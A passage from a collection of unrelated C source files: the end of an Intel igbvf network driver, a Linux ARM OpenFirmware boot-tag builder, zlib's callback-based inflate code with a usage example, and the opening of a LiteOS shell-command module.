adapter->hw.hw_addr ) { DBG ( "err_ioremap\n" ); goto err_ioremap; } /* setup adapter struct */ err = igbvf_sw_init ( adapter ); if (err) { DBG ( "err_sw_init\n" ); goto err_sw_init; } /* reset the controller to put the device in a known good state */ err = hw->mac.ops.reset_hw ( hw ); if ( err ) { DBG ("PF still in reset state, assigning new address\n"); /* Assign a placeholder six-byte Ethernet MAC (indices 0-5) */ netdev->hw_addr[0] = 0x21; netdev->hw_addr[1] = 0x21; netdev->hw_addr[2] = 0x21; netdev->hw_addr[3] = 0x21; netdev->hw_addr[4] = 0x21; netdev->hw_addr[5] = 0x21; } else { err = hw->mac.ops.read_mac_addr(hw); if (err) { DBG ("Error reading MAC address\n"); goto err_hw_init; } if ( ! is_valid_ether_addr(adapter->hw.mac.addr) ) { /* Assign random MAC address */ eth_random_addr(adapter->hw.mac.addr); } } memcpy ( netdev->hw_addr, adapter->hw.mac.addr, ETH_ALEN ); /* reset the hardware with the new settings */ igbvf_reset ( adapter ); /* let the f/w know that the h/w is now under the control of the * driver. */ igbvf_get_hw_control ( adapter ); /* Mark as link up; we don't yet handle link state */ netdev_link_up ( netdev ); if ( ( err = register_netdev ( netdev ) ) != 0) { DBG ( "err_register\n" ); goto err_register; } DBG ("igbvf_probe_succeeded\n"); return 0; err_register: err_hw_init: err_sw_init: iounmap ( adapter->hw.hw_addr ); err_ioremap: netdev_put ( netdev ); err_alloc_etherdev: return err; } /** * igbvf_remove - Device Removal Routine * @pdev: PCI device information struct * * igbvf_remove is called by the PCI subsystem to alert the driver * that it should release a PCI device. This could be caused by a * Hot-Plug event, or because the driver is going to be removed from * memory. **/ void igbvf_remove ( struct pci_device *pdev ) { struct net_device *netdev = pci_get_drvdata ( pdev ); struct igbvf_adapter *adapter = netdev_priv ( netdev ); DBG ( "igbvf_remove\n" ); if ( adapter->hw.flash_address ) iounmap ( adapter->hw.flash_address ); if ( adapter->hw.hw_addr ) iounmap ( adapter->hw.hw_addr ); unregister_netdev ( netdev ); igbvf_reset ( adapter ); netdev_nullify ( netdev ); netdev_put ( netdev ); } static struct pci_device_id igbvf_pci_tbl[] = { PCI_ROM(0x8086, 0x10CA, "igbvf", "E1000_DEV_ID_82576_VF", 0), PCI_ROM(0x8086, 0x1520, "i350vf", "E1000_DEV_ID_I350_VF", 0), }; struct pci_driver igbvf_driver __pci_driver = { .ids = igbvf_pci_tbl, .id_count = (sizeof(igbvf_pci_tbl) / sizeof(igbvf_pci_tbl[0])), .probe = igbvf_probe, .remove = igbvf_remove, };
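/* Editorial sketch (not from the original driver): the Tx bookkeeping above
   reduces to a fixed-size circular buffer. Assuming a ring of NUM_TX_DESC
   slots N, the invariants maintained by the code are:

     tail     = (tail + 1) % N;   // producer (igbvf_transmit) after queuing
     head     = (head + 1) % N;   // consumer (igbvf_process_tx_packets) after DD
     fill_ctr in [0, N];          // ring full when fill_ctr == N -> -ENOBUFS

   Hardware fetches descriptors from head up to the TDT(0) value written by
   the producer; the DD status bit is what hands a slot back to software. */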
918369.c
/* * linux/arch/arm/boot/compressed/ofw-shark.c * * by Alexander Schulz * * This file is used to get some basic information * about the memory layout of the shark we are running * on. Memory is usually divided into blocks of 8 MB, * and bootargs are copied from OpenFirmware. */ #include <linux/kernel.h> #include <linux/types.h> #include <asm/setup.h> #include <asm/page.h> asmlinkage void create_params (unsigned long *buffer) { /* Is there a better address? Also change in mach-shark/core.c */ struct tag *tag = (struct tag *) 0x08003000; int j,i,m,k,nr_banks,size; unsigned char *c; k = 0; /* Head of the taglist */ tag->hdr.tag = ATAG_CORE; tag->hdr.size = tag_size(tag_core); tag->u.core.flags = 1; tag->u.core.pagesize = PAGE_SIZE; tag->u.core.rootdev = 0; /* Build up one tagged block for each memory region */ size=0; nr_banks=(unsigned int) buffer[0]; for (j=0;j<nr_banks;j++){ /* search the lowest address and put it into the next entry */ /* not a fast sort algorithm, but there are at most 8 entries */ /* and this is used only once anyway */ m=0xffffffff; for (i=0;i<(unsigned int) buffer[0];i++){ if (buffer[2*i+1]<m) { m=buffer[2*i+1]; k=i; } } tag = tag_next(tag); tag->hdr.tag = ATAG_MEM; tag->hdr.size = tag_size(tag_mem32); tag->u.mem.size = buffer[2*k+2]; tag->u.mem.start = buffer[2*k+1]; size += buffer[2*k+2]; buffer[2*k+1]=0xffffffff; /* mark as copied */ } /* The command line */ tag = tag_next(tag); tag->hdr.tag = ATAG_CMDLINE; c=(unsigned char *)(&buffer[34]); j=0; while (*c) tag->u.cmdline.cmdline[j++]=*c++; tag->u.cmdline.cmdline[j]=0; tag->hdr.size = (j + 7 + sizeof(struct tag_header)) >> 2; /* Hardware revision */ tag = tag_next(tag); tag->hdr.tag = ATAG_REVISION; tag->hdr.size = tag_size(tag_revision); tag->u.revision.rev = ((unsigned char) buffer[33])-'0'; /* End of the taglist */ tag = tag_next(tag); tag->hdr.tag = 0; tag->hdr.size = 0; } typedef int (*ofw_handle_t)(void *); /* Everything below is called with a wrong MMU setting. * This means: no string constants, no initialization of * arrays, no global variables!
This is ugly but I didn't * want to write this in assembler :-) */ int of_decode_int(const unsigned char *p) { unsigned int i = *p++ << 8; i = (i + *p++) << 8; i = (i + *p++) << 8; return (i + *p); } int OF_finddevice(ofw_handle_t openfirmware, char *name) { unsigned int args[8]; char service[12]; service[0]='f'; service[1]='i'; service[2]='n'; service[3]='d'; service[4]='d'; service[5]='e'; service[6]='v'; service[7]='i'; service[8]='c'; service[9]='e'; service[10]='\0'; args[0]=(unsigned int)service; args[1]=1; args[2]=1; args[3]=(unsigned int)name; if (openfirmware(args) == -1) return -1; return args[4]; } int OF_getproplen(ofw_handle_t openfirmware, int handle, char *prop) { unsigned int args[8]; char service[12]; service[0]='g'; service[1]='e'; service[2]='t'; service[3]='p'; service[4]='r'; service[5]='o'; service[6]='p'; service[7]='l'; service[8]='e'; service[9]='n'; service[10]='\0'; args[0] = (unsigned int)service; args[1] = 2; args[2] = 1; args[3] = (unsigned int)handle; args[4] = (unsigned int)prop; if (openfirmware(args) == -1) return -1; return args[5]; } int OF_getprop(ofw_handle_t openfirmware, int handle, char *prop, void *buf, unsigned int buflen) { unsigned int args[8]; char service[8]; service[0]='g'; service[1]='e'; service[2]='t'; service[3]='p'; service[4]='r'; service[5]='o'; service[6]='p'; service[7]='\0'; args[0] = (unsigned int)service; args[1] = 4; args[2] = 1; args[3] = (unsigned int)handle; args[4] = (unsigned int)prop; args[5] = (unsigned int)buf; args[6] = buflen; if (openfirmware(args) == -1) return -1; return args[7]; } asmlinkage void ofw_init(ofw_handle_t o, int *nomr, int *pointer) { int phandle,i,mem_len,buffer[32]; char temp[15]; temp[0]='/'; temp[1]='m'; temp[2]='e'; temp[3]='m'; temp[4]='o'; temp[5]='r'; temp[6]='y'; temp[7]='\0'; phandle=OF_finddevice(o,temp); temp[0]='r'; temp[1]='e'; temp[2]='g'; temp[3]='\0'; mem_len = OF_getproplen(o,phandle, temp); OF_getprop(o,phandle, temp, buffer, mem_len); *nomr=mem_len >> 3; for (i=0; i<=mem_len/4; i++) pointer[i]=of_decode_int((const unsigned char *)&buffer[i]); temp[0]='/'; temp[1]='c'; temp[2]='h'; temp[3]='o'; temp[4]='s'; temp[5]='e'; temp[6]='n'; temp[7]='\0'; phandle=OF_finddevice(o,temp); temp[0]='b'; temp[1]='o'; temp[2]='o'; temp[3]='t'; temp[4]='a'; temp[5]='r'; temp[6]='g'; temp[7]='s'; temp[8]='\0'; mem_len = OF_getproplen(o,phandle, temp); OF_getprop(o,phandle, temp, buffer, mem_len); if (mem_len > 128) mem_len=128; for (i=0; i<=mem_len/4; i++) pointer[i+33]=buffer[i]; pointer[i+33]=0; temp[0]='/'; temp[1]='\0'; phandle=OF_finddevice(o,temp); temp[0]='b'; temp[1]='a'; temp[2]='n'; temp[3]='n'; temp[4]='e'; temp[5]='r'; temp[6]='-'; temp[7]='n'; temp[8]='a'; temp[9]='m'; temp[10]='e'; temp[11]='\0'; mem_len = OF_getproplen(o,phandle, temp); OF_getprop(o,phandle, temp, buffer, mem_len); * ((unsigned char *) &pointer[32]) = ((unsigned char *) buffer)[mem_len-2]; }
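/* Editorial sketch (not part of the original file): of_decode_int() above
   rebuilds a big-endian 32-bit OpenFirmware cell from raw bytes, e.g.

     unsigned char cell[4] = { 0x00, 0x80, 0x00, 0x00 };
     int bank = of_decode_int (cell);   // 0x00800000 == 8 MB

   which is why the memory "reg" property can be walked one 4-byte cell at a
   time when building the ATAG_MEM list in create_params(). */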
344192.c
/* infback.c -- inflate using a call-back interface * Copyright (C) 1995-2016 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* This code is largely copied from inflate.c. Normally either infback.o or inflate.o would be linked into an application--not both. The interface with inffast.c is retained so that optimized assembler-coded versions of inflate_fast() can be used with either inflate.c or infback.c. */ #include "zutil.h" #include "inftrees.h" #include "inflate.h" #include "inffast.h" /* function prototypes */ local void fixedtables OF((struct inflate_state FAR *state)); /* strm provides memory allocation functions in zalloc and zfree, or Z_NULL to use the library memory allocation functions. windowBits is in the range 8..15, and window is a user-supplied window and output buffer that is 2**windowBits bytes. */ int ZEXPORT inflateBackInit_(strm, windowBits, window, version, stream_size) z_streamp strm; int windowBits; unsigned char FAR *window; const char *version; int stream_size; { struct inflate_state FAR *state; if (version == Z_NULL || version[0] != ZLIB_VERSION[0] || stream_size != (int)(sizeof(z_stream))) return Z_VERSION_ERROR; if (strm == Z_NULL || window == Z_NULL || windowBits < 8 || windowBits > 15) return Z_STREAM_ERROR; strm->msg = Z_NULL; /* in case we return an error */ if (strm->zalloc == (alloc_func)0) { #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zalloc = zcalloc; strm->opaque = (voidpf)0; #endif } if (strm->zfree == (free_func)0) #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zfree = zcfree; #endif state = (struct inflate_state FAR *)ZALLOC(strm, 1, sizeof(struct inflate_state)); if (state == Z_NULL) return Z_MEM_ERROR; Tracev((stderr, "inflate: allocated\n")); strm->state = (struct internal_state FAR *)state; state->dmax = 32768U; state->wbits = (uInt)windowBits; state->wsize = 1U << windowBits; state->window = window; state->wnext = 0; state->whave = 0; return Z_OK; } /* Return state with length and distance decoding tables and index sizes set to fixed code decoding. Normally this returns fixed tables from inffixed.h. If BUILDFIXED is defined, then instead this routine builds the tables the first time it's called, and returns those tables the first time and thereafter. This reduces the size of the code by about 2K bytes, in exchange for a little execution time. However, BUILDFIXED should not be used for threaded applications, since the rewriting of the tables and virgin may not be thread-safe.
*/ local void fixedtables(state) struct inflate_state FAR *state; { #ifdef BUILDFIXED static int virgin = 1; static code *lenfix, *distfix; static code fixed[544]; /* build fixed huffman tables if first call (may not be thread safe) */ if (virgin) { unsigned sym, bits; static code *next; /* literal/length table */ sym = 0; while (sym < 144) state->lens[sym++] = 8; while (sym < 256) state->lens[sym++] = 9; while (sym < 280) state->lens[sym++] = 7; while (sym < 288) state->lens[sym++] = 8; next = fixed; lenfix = next; bits = 9; inflate_table(LENS, state->lens, 288, &(next), &(bits), state->work); /* distance table */ sym = 0; while (sym < 32) state->lens[sym++] = 5; distfix = next; bits = 5; inflate_table(DISTS, state->lens, 32, &(next), &(bits), state->work); /* do this just once */ virgin = 0; } #else /* !BUILDFIXED */ # include "inffixed.h" #endif /* BUILDFIXED */ state->lencode = lenfix; state->lenbits = 9; state->distcode = distfix; state->distbits = 5; } /* Macros for inflateBack(): */ /* Load returned state from inflate_fast() */ #define LOAD() \ do { \ put = strm->next_out; \ left = strm->avail_out; \ next = strm->next_in; \ have = strm->avail_in; \ hold = state->hold; \ bits = state->bits; \ } while (0) /* Set state from registers for inflate_fast() */ #define RESTORE() \ do { \ strm->next_out = put; \ strm->avail_out = left; \ strm->next_in = next; \ strm->avail_in = have; \ state->hold = hold; \ state->bits = bits; \ } while (0) /* Clear the input bit accumulator */ #define INITBITS() \ do { \ hold = 0; \ bits = 0; \ } while (0) /* Assure that some input is available. If input is requested, but denied, then return a Z_BUF_ERROR from inflateBack(). */ #define PULL() \ do { \ if (have == 0) { \ have = in(in_desc, &next); \ if (have == 0) { \ next = Z_NULL; \ ret = Z_BUF_ERROR; \ goto inf_leave; \ } \ } \ } while (0) /* Get a byte of input into the bit accumulator, or return from inflateBack() with an error if there is no input available. */ #define PULLBYTE() \ do { \ PULL(); \ have--; \ hold += (unsigned long)(*next++) << bits; \ bits += 8; \ } while (0) /* Assure that there are at least n bits in the bit accumulator. If there is not enough available input to do that, then return from inflateBack() with an error. */ #define NEEDBITS(n) \ do { \ while (bits < (unsigned)(n)) \ PULLBYTE(); \ } while (0) /* Return the low n bits of the bit accumulator (n < 16) */ #define BITS(n) \ ((unsigned)hold & ((1U << (n)) - 1)) /* Remove n bits from the bit accumulator */ #define DROPBITS(n) \ do { \ hold >>= (n); \ bits -= (unsigned)(n); \ } while (0) /* Remove zero to seven bits as needed to go to a byte boundary */ #define BYTEBITS() \ do { \ hold >>= bits & 7; \ bits -= bits & 7; \ } while (0) /* Assure that some output space is available, by writing out the window if it's full. If the write fails, return from inflateBack() with a Z_BUF_ERROR. */ #define ROOM() \ do { \ if (left == 0) { \ put = state->window; \ left = state->wsize; \ state->whave = left; \ if (out(out_desc, put, left)) { \ ret = Z_BUF_ERROR; \ goto inf_leave; \ } \ } \ } while (0) /* strm provides the memory allocation functions and window buffer on input, and provides information on the unused input on return. For Z_DATA_ERROR returns, strm will also provide an error message. in() and out() are the call-back input and output functions. When inflateBack() needs more input, it calls in(). When inflateBack() has filled the window with output, or when it completes with data in the window, it calls out() to write out the data. 
The application must not change the provided input until in() is called again or inflateBack() returns. The application must not change the window/output buffer until inflateBack() returns. in() and out() are called with a descriptor parameter provided in the inflateBack() call. This parameter can be a structure that provides the information required to do the read or write, as well as accumulated information on the input and output such as totals and check values. in() should return zero on failure. out() should return non-zero on failure. If either in() or out() fails, then inflateBack() returns a Z_BUF_ERROR. strm->next_in can be checked for Z_NULL to see whether it was in() or out() that caused the error. Otherwise, inflateBack() returns Z_STREAM_END on success, Z_DATA_ERROR for a deflate format error, or Z_MEM_ERROR if it could not allocate memory for the state. inflateBack() can also return Z_STREAM_ERROR if the input parameters are not correct, i.e. strm is Z_NULL or the state was not initialized. */ int ZEXPORT inflateBack(strm, in, in_desc, out, out_desc) z_streamp strm; in_func in; void FAR *in_desc; out_func out; void FAR *out_desc; { struct inflate_state FAR *state; z_const unsigned char FAR *next; /* next input */ unsigned char FAR *put; /* next output */ unsigned have, left; /* available input and output */ unsigned long hold; /* bit buffer */ unsigned bits; /* bits in bit buffer */ unsigned copy; /* number of stored or match bytes to copy */ unsigned char FAR *from; /* where to copy match bytes from */ code here; /* current decoding table entry */ code last; /* parent table entry */ unsigned len; /* length to copy for repeats, bits to drop */ int ret; /* return code */ static const unsigned short order[19] = /* permutation of code lengths */ {16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15}; /* Check that the strm exists and that the state was initialized */ if (strm == Z_NULL || strm->state == Z_NULL) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; /* Reset the state */ strm->msg = Z_NULL; state->mode = TYPE; state->last = 0; state->whave = 0; next = strm->next_in; have = next != Z_NULL ? strm->avail_in : 0; hold = 0; bits = 0; put = state->window; left = state->wsize; /* Inflate until end of block marked as last */ for (;;) switch (state->mode) { case TYPE: /* determine and dispatch block type */ if (state->last) { BYTEBITS(); state->mode = DONE; break; } NEEDBITS(3); state->last = BITS(1); DROPBITS(1); switch (BITS(2)) { case 0: /* stored block */ Tracev((stderr, "inflate: stored block%s\n", state->last ? " (last)" : "")); state->mode = STORED; break; case 1: /* fixed block */ fixedtables(state); Tracev((stderr, "inflate: fixed codes block%s\n", state->last ? " (last)" : "")); state->mode = LEN; /* decode codes */ break; case 2: /* dynamic block */ Tracev((stderr, "inflate: dynamic codes block%s\n", state->last ?
" (last)" : "")); state->mode = TABLE; break; case 3: strm->msg = (char *)"invalid block type"; state->mode = BAD; } DROPBITS(2); break; case STORED: /* get and verify stored block length */ BYTEBITS(); /* go to byte boundary */ NEEDBITS(32); if ((hold & 0xffff) != ((hold >> 16) ^ 0xffff)) { strm->msg = (char *)"invalid stored block lengths"; state->mode = BAD; break; } state->length = (unsigned)hold & 0xffff; Tracev((stderr, "inflate: stored length %u\n", state->length)); INITBITS(); /* copy stored block from input to output */ while (state->length != 0) { copy = state->length; PULL(); ROOM(); if (copy > have) copy = have; if (copy > left) copy = left; zmemcpy(put, next, copy); have -= copy; next += copy; left -= copy; put += copy; state->length -= copy; } Tracev((stderr, "inflate: stored end\n")); state->mode = TYPE; break; case TABLE: /* get dynamic table entries descriptor */ NEEDBITS(14); state->nlen = BITS(5) + 257; DROPBITS(5); state->ndist = BITS(5) + 1; DROPBITS(5); state->ncode = BITS(4) + 4; DROPBITS(4); #ifndef PKZIP_BUG_WORKAROUND if (state->nlen > 286 || state->ndist > 30) { strm->msg = (char *)"too many length or distance symbols"; state->mode = BAD; break; } #endif Tracev((stderr, "inflate: table sizes ok\n")); /* get code length code lengths (not a typo) */ state->have = 0; while (state->have < state->ncode) { NEEDBITS(3); state->lens[order[state->have++]] = (unsigned short)BITS(3); DROPBITS(3); } while (state->have < 19) state->lens[order[state->have++]] = 0; state->next = state->codes; state->lencode = (code const FAR *)(state->next); state->lenbits = 7; ret = inflate_table(CODES, state->lens, 19, &(state->next), &(state->lenbits), state->work); if (ret) { strm->msg = (char *)"invalid code lengths set"; state->mode = BAD; break; } Tracev((stderr, "inflate: code lengths ok\n")); /* get length and distance code code lengths */ state->have = 0; while (state->have < state->nlen + state->ndist) { for (;;) { here = state->lencode[BITS(state->lenbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if (here.val < 16) { DROPBITS(here.bits); state->lens[state->have++] = here.val; } else { if (here.val == 16) { NEEDBITS(here.bits + 2); DROPBITS(here.bits); if (state->have == 0) { strm->msg = (char *)"invalid bit length repeat"; state->mode = BAD; break; } len = (unsigned)(state->lens[state->have - 1]); copy = 3 + BITS(2); DROPBITS(2); } else if (here.val == 17) { NEEDBITS(here.bits + 3); DROPBITS(here.bits); len = 0; copy = 3 + BITS(3); DROPBITS(3); } else { NEEDBITS(here.bits + 7); DROPBITS(here.bits); len = 0; copy = 11 + BITS(7); DROPBITS(7); } if (state->have + copy > state->nlen + state->ndist) { strm->msg = (char *)"invalid bit length repeat"; state->mode = BAD; break; } while (copy--) state->lens[state->have++] = (unsigned short)len; } } /* handle error breaks in while */ if (state->mode == BAD) break; /* check for end-of-block code (better have one) */ if (state->lens[256] == 0) { strm->msg = (char *)"invalid code -- missing end-of-block"; state->mode = BAD; break; } /* build code tables -- note: do not change the lenbits or distbits values here (9 and 6) without reading the comments in inftrees.h concerning the ENOUGH constants, which depend on those values */ state->next = state->codes; state->lencode = (code const FAR *)(state->next); state->lenbits = 9; ret = inflate_table(LENS, state->lens, state->nlen, &(state->next), &(state->lenbits), state->work); if (ret) { strm->msg = (char *)"invalid literal/lengths set"; state->mode = BAD; break; } state->distcode = 
(code const FAR *)(state->next); state->distbits = 6; ret = inflate_table(DISTS, state->lens + state->nlen, state->ndist, &(state->next), &(state->distbits), state->work); if (ret) { strm->msg = (char *)"invalid distances set"; state->mode = BAD; break; } Tracev((stderr, "inflate: codes ok\n")); state->mode = LEN; case LEN: /* use inflate_fast() if we have enough input and output */ if (have >= 6 && left >= 258) { RESTORE(); if (state->whave < state->wsize) state->whave = state->wsize - left; inflate_fast(strm, state->wsize); LOAD(); break; } /* get a literal, length, or end-of-block code */ for (;;) { here = state->lencode[BITS(state->lenbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if (here.op && (here.op & 0xf0) == 0) { last = here; for (;;) { here = state->lencode[last.val + (BITS(last.bits + last.op) >> last.bits)]; if ((unsigned)(last.bits + here.bits) <= bits) break; PULLBYTE(); } DROPBITS(last.bits); } DROPBITS(here.bits); state->length = (unsigned)here.val; /* process literal */ if (here.op == 0) { Tracevv((stderr, here.val >= 0x20 && here.val < 0x7f ? "inflate: literal '%c'\n" : "inflate: literal 0x%02x\n", here.val)); ROOM(); *put++ = (unsigned char)(state->length); left--; state->mode = LEN; break; } /* process end of block */ if (here.op & 32) { Tracevv((stderr, "inflate: end of block\n")); state->mode = TYPE; break; } /* invalid code */ if (here.op & 64) { strm->msg = (char *)"invalid literal/length code"; state->mode = BAD; break; } /* length code -- get extra bits, if any */ state->extra = (unsigned)(here.op) & 15; if (state->extra != 0) { NEEDBITS(state->extra); state->length += BITS(state->extra); DROPBITS(state->extra); } Tracevv((stderr, "inflate: length %u\n", state->length)); /* get distance code */ for (;;) { here = state->distcode[BITS(state->distbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if ((here.op & 0xf0) == 0) { last = here; for (;;) { here = state->distcode[last.val + (BITS(last.bits + last.op) >> last.bits)]; if ((unsigned)(last.bits + here.bits) <= bits) break; PULLBYTE(); } DROPBITS(last.bits); } DROPBITS(here.bits); if (here.op & 64) { strm->msg = (char *)"invalid distance code"; state->mode = BAD; break; } state->offset = (unsigned)here.val; /* get distance extra bits, if any */ state->extra = (unsigned)(here.op) & 15; if (state->extra != 0) { NEEDBITS(state->extra); state->offset += BITS(state->extra); DROPBITS(state->extra); } if (state->offset > state->wsize - (state->whave < state->wsize ? 
left : 0)) { strm->msg = (char *)"invalid distance too far back"; state->mode = BAD; break; } Tracevv((stderr, "inflate: distance %u\n", state->offset)); /* copy match from window to output */ do { ROOM(); copy = state->wsize - state->offset; if (copy < left) { from = put + copy; copy = left - copy; } else { from = put - state->offset; copy = left; } if (copy > state->length) copy = state->length; state->length -= copy; left -= copy; do { *put++ = *from++; } while (--copy); } while (state->length != 0); break; case DONE: /* inflate stream terminated properly -- write leftover output */ ret = Z_STREAM_END; if (left < state->wsize) { if (out(out_desc, state->window, state->wsize - left)) ret = Z_BUF_ERROR; } goto inf_leave; case BAD: ret = Z_DATA_ERROR; goto inf_leave; default: /* can't happen, but makes compilers happy */ ret = Z_STREAM_ERROR; goto inf_leave; } /* Return unused input */ inf_leave: strm->next_in = next; strm->avail_in = have; return ret; } int ZEXPORT inflateBackEnd(strm) z_streamp strm; { if (strm == Z_NULL || strm->state == Z_NULL || strm->zfree == (free_func)0) return Z_STREAM_ERROR; ZFREE(strm, strm->state); strm->state = Z_NULL; Tracev((stderr, "inflate: end\n")); return Z_OK; }
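/* Usage sketch for the call-back interface above -- an editor's illustration, not part of zlib. It raw-inflates one FILE* to another through the documented inflateBackInit()/inflateBack()/inflateBackEnd() API; CHUNK, pull(), push() and inflate_file() are assumed names chosen for this example. */
#include <stdio.h>
#include "zlib.h"

#define CHUNK 16384

static unsigned char in_buf[CHUNK];
static unsigned char window[32768];     /* 2**15 bytes for windowBits = 15 */

/* in() callback: supply up to CHUNK bytes of compressed input, 0 on EOF/error */
static unsigned pull(void *desc, z_const unsigned char **buf)
{
    *buf = in_buf;
    return (unsigned)fread(in_buf, 1, CHUNK, (FILE *)desc);
}

/* out() callback: write a filled window to the destination, non-zero on failure */
static int push(void *desc, unsigned char *buf, unsigned len)
{
    return fwrite(buf, 1, len, (FILE *)desc) != len;
}

static int inflate_file(FILE *src, FILE *dst)
{
    z_stream strm;
    int ret;

    strm.zalloc = Z_NULL;               /* use the library allocators */
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    ret = inflateBackInit(&strm, 15, window);
    if (ret != Z_OK)
        return ret;
    strm.next_in = Z_NULL;              /* no input preloaded: the PULL() macro */
    strm.avail_in = 0;                  /* above then fetches it via in() */
    ret = inflateBack(&strm, pull, src, push, dst);
    (void)inflateBackEnd(&strm);
    return ret;                         /* Z_STREAM_END on success */
}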
584764.c
/* * Copyright (c) 2013-2019 Huawei Technologies Co., Ltd. All rights reserved. * Copyright (c) 2020-2021 Huawei Device Co., Ltd. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, this list * of conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "shcmd.h" #include "show.h" #include "shmsg.h" #include "stdlib.h" #include "unistd.h" #include "dirent.h" #include "securec.h" #include "los_mux.h" #include "los_memory.h" #define SHELL_INIT_MAGIC_FLAG 0xABABABAB STATIC CmdModInfo cmdInfo; ShellCB *g_shellCB = NULL; CmdItem g_shellcmdAll[] = { {CMD_TYPE_STD, "date", XARGS, (CmdCallBackFunc)OsShellCmdDate}, {CMD_TYPE_EX, "task", 1, (CmdCallBackFunc)OsShellCmdDumpTask}, {CMD_TYPE_EX, "free", XARGS, (CmdCallBackFunc)OsShellCmdFree}, #ifdef LWIP_SHELLCMD_ENABLE {CMD_TYPE_EX, "ifconfig", XARGS, (CmdCallBackFunc)lwip_ifconfig}, {CMD_TYPE_EX, "ping", XARGS, (CmdCallBackFunc)OsShellPing}, #endif {CMD_TYPE_EX, "touch", XARGS, (CmdCallBackFunc)OsShellCmdTouch}, {CMD_TYPE_EX, "ls", XARGS, (CmdCallBackFunc)OsShellCmdLs}, {CMD_TYPE_EX, "pwd", XARGS, (CmdCallBackFunc)OsShellCmdPwd}, {CMD_TYPE_EX, "cd", XARGS, (CmdCallBackFunc)OsShellCmdCd}, {CMD_TYPE_EX, "cat", XARGS, (CmdCallBackFunc)OsShellCmdCat}, {CMD_TYPE_EX, "rm", XARGS, (CmdCallBackFunc)OsShellCmdRm}, {CMD_TYPE_EX, "rmdir", XARGS, (CmdCallBackFunc)OsShellCmdRmdir}, {CMD_TYPE_EX, "mkdir", XARGS, (CmdCallBackFunc)OsShellCmdMkdir}, {CMD_TYPE_EX, "cp", XARGS, (CmdCallBackFunc)OsShellCmdCp}, {CMD_TYPE_EX, "help", 0, (CmdCallBackFunc)OsShellCmdHelp}, }; CmdModInfo *OsCmdInfoGet(VOID) { return &cmdInfo; } /* * Description: Pass in a string and clear the useless spaces, which includes: * 1) Squeezing each run of spaces that is not enclosed by double quotes into a single space * 2) Clearing all spaces before the first valid character * Input: cmdKey : Pass in the buffer string, which is ready to be operated on * cmdOut : Pass out the buffer string, which has already been operated on * size : cmdKey length */ LITE_OS_SEC_TEXT_MINOR UINT32 OsCmdKeyShift(const CHAR *cmdKey, CHAR *cmdOut, UINT32 size) { CHAR *output = NULL; CHAR *outputBak = NULL; UINT32 len; INT32 ret; BOOL quotes = FALSE; if ((cmdKey == NULL) || (cmdOut == NULL)) { return (UINT32)OS_ERROR; } len = strlen(cmdKey); if (len >= size) { return (UINT32)OS_ERROR; } output = (CHAR*)LOS_MemAlloc(m_aucSysMem0, len + 1); if (output == NULL) { PRINTK("malloc failure in %s[%d]", __FUNCTION__, __LINE__); return (UINT32)OS_ERROR; } /* Back up the 'output' start address */ outputBak = output; /* Scan each character in 'cmdKey', squeeze the extra spaces and ignore invalid characters */ for (; *cmdKey != '\0'; cmdKey++) { /* Detected a double quote, switch the matching status */ if (*(cmdKey) == '\"') { SWITCH_QUOTES_STATUS(quotes); } /* Ignore the current character in the following situations: */ /* 1) Quote matching status is FALSE (i.e. the space is not enclosed by double quotes) */ /* 2) The current character is a space */ /* 3) The next character is a space too, or the string has already reached the end (\0) */ /* 4) Invalid characters, such as single quotes */ if ((*cmdKey == ' ') && ((*(cmdKey + 1) == ' ') || (*(cmdKey + 1) == '\0')) && QUOTES_STATUS_CLOSE(quotes)) { continue; } if (*cmdKey == '\'') { continue; } *output = *cmdKey; output++; } *output = '\0'; /* Restore the 'output' start address */ output = outputBak; len = strlen(output); /* Clear the space at the first character in the buffer */ if (*outputBak == ' ') { output++; len--; } /* Copy out the buffer that has already been processed */ ret = strncpy_s(cmdOut, size, output, len); if (ret != EOK) { PRINT_ERR("%s,%d strncpy_s failed, err:%d!\n", __FUNCTION__, __LINE__, ret); (VOID)LOS_MemFree(m_aucSysMem0, output); return OS_ERROR; } cmdOut[len] = '\0'; (VOID)LOS_MemFree(m_aucSysMem0, output); return LOS_OK; } LITE_OS_SEC_TEXT_MINOR BOOL OsCmdKeyCheck(const CHAR *cmdKey) { const CHAR *temp = cmdKey; enum Stat { STAT_NONE, STAT_DIGIT, STAT_OTHER } state = STAT_NONE; if (strlen(cmdKey) >= CMD_KEY_LEN) { return FALSE; } while (*temp != '\0') { if (!((*temp <= '9') && (*temp >= '0')) && !((*temp <= 'z') && (*temp >= 'a')) && !((*temp <= 'Z') && (*temp >= 'A')) && (*temp != '_') && (*temp != '-')) { return FALSE; } if 